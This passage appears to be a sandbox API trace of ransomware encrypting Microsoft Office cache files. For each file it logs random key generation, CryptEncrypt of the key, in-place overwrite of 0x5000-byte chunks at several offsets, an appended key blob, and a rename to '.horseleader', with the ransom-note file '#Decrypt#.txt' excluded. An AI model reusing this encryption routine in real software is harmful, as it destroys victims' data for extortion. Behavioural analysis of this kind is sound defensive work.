returned 0x0 [0219.387] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=36233052) returned 1 [0219.387] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.388] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.393] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.393] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.394] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x11447ae, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.395] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.397] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.397] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.397] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x2288f5c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.397] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: 
lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.400] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.400] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.400] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.400] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0219.400] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0219.401] CloseHandle (hObject=0x21c) returned 1 [0219.401] GetProcessHeap () returned 0x780000 [0219.401] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0219.401] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.horseleader") returned 91 [0219.401] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab.horseleader")) returned 1 [0219.402] GetProcessHeap () 
returned 0x780000 [0219.402] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0219.402] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe3a02e00, ftCreationTime.dwHighDateTime=0x1cac5f7, ftLastAccessTime.dwLowDateTime=0xe3a02e00, ftLastAccessTime.dwHighDateTime=0x1cac5f7, ftLastWriteTime.dwLowDateTime=0x17e0dbf0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x165510, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="PidGenX.dll", cAlternateFileName="")) returned 1 [0219.402] lstrcmpiW (lpString1="PidGenX.dll", lpString2="Windows") returned -1 [0219.402] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0219.402] StrStrIW (lpFirst="PidGenX.dll", lpSrch=".horseleader") returned 0x0 [0219.402] lstrcmpW (lpString1="PidGenX.dll", lpString2="#Decrypt#.txt") returned 1 [0219.402] lstrcmpW (lpString1="PidGenX.dll", lpString2="_uninstalling_.png") returned 1 [0219.402] lstrlenW (lpString=".testttjffg") returned 11 [0219.402] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll", lpSrch=".testttjffg") returned 0x0 [0219.402] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0219.402] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0219.402] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0219.404] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0219.404] StrStrW (lpFirst="PidGenX.dll", lpSrch=".txt") returned 0x0 [0219.404] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1463568) returned 1 [0219.404] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.404] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.407] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.407] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.407] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xb0288, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.407] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.410] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.410] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.410] 
SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x160510, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.410] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.412] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.412] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.412] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.412] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0219.412] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0219.413] CloseHandle (hObject=0x21c) returned 1 [0219.413] GetProcessHeap () returned 0x780000 [0219.413] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0219.413] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.horseleader") returned 90 [0219.413] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all 
users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll.horseleader")) returned 1 [0219.414] GetProcessHeap () returned 0x780000 [0219.414] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0219.414] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe06a9500, ftCreationTime.dwHighDateTime=0x1cac7e5, ftLastAccessTime.dwLowDateTime=0xe06a9500, ftLastAccessTime.dwHighDateTime=0x1cac7e5, ftLastWriteTime.dwLowDateTime=0x17c42c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1 [0219.414] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="Windows") returned -1 [0219.414] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0219.414] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".horseleader") returned 0x0 [0219.414] lstrcmpW (lpString1="pkeyconfig-office.xrm-ms", lpString2="#Decrypt#.txt") returned 1 [0219.414] lstrcmpW (lpString1="pkeyconfig-office.xrm-ms", lpString2="_uninstalling_.png") returned 1 [0219.414] lstrlenW (lpString=".testttjffg") returned 11 [0219.414] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", lpSrch=".testttjffg") returned 0x0 [0219.414] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0219.414] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, 
dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0219.414] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0219.415] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0219.415] StrStrW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".txt") returned 0x0 [0219.415] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=715834) returned 1 [0219.415] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.415] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.417] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.417] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.422] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x54e1d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.422] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, 
lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.424] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.424] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.424] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xa9c3a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.424] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.426] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.426] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.426] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.426] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0219.427] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0219.427] CloseHandle (hObject=0x21c) returned 1 [0219.427] GetProcessHeap () returned 0x780000 [0219.427] 
RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0219.427] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.horseleader") returned 103 [0219.427] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.horseleader")) returned 1 [0219.428] GetProcessHeap () returned 0x780000 [0219.428] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0219.428] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbb2e2000, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbb2e2000, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x170fe40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x1a41c00, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="ProPlusrWW.msi", cAlternateFileName="PROPLU~1.MSI")) returned 1 [0219.428] lstrcmpiW (lpString1="ProPlusrWW.msi", lpString2="Windows") returned -1 [0219.428] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 81 [0219.428] StrStrIW (lpFirst="ProPlusrWW.msi", lpSrch=".horseleader") returned 0x0 [0219.428] lstrcmpW (lpString1="ProPlusrWW.msi", lpString2="#Decrypt#.txt") returned 1 [0219.428] lstrcmpW (lpString1="ProPlusrWW.msi", 
lpString2="_uninstalling_.png") returned 1 [0219.428] lstrlenW (lpString=".testttjffg") returned 11 [0219.428] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi", lpSrch=".testttjffg") returned 0x0 [0219.428] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0219.428] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0219.429] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0219.434] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 81 [0219.434] StrStrW (lpFirst="ProPlusrWW.msi", lpSrch=".txt") returned 0x0 [0219.434] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=27532288) returned 1 [0219.434] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.434] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.437] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.437] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, 
lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.438] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xd1e600, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.439] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.441] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.441] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.441] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1a3cc00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.441] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.444] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.444] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.444] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.444] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, 
lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0219.444] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0219.444] CloseHandle (hObject=0x21c) returned 1 [0219.444] GetProcessHeap () returned 0x780000 [0219.445] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0219.445] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.horseleader") returned 93 [0219.445] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi.horseleader")) returned 1 [0219.446] GetProcessHeap () returned 0x780000 [0219.446] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0219.446] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x170fe40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x41d4, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="ProPlusrWW.xml", cAlternateFileName="PROPLU~1.XML")) returned 1 [0219.446] lstrcmpiW (lpString1="ProPlusrWW.xml", lpString2="Windows") returned -1 [0219.446] wnsprintfW (in: pszDest=0x79a620, 
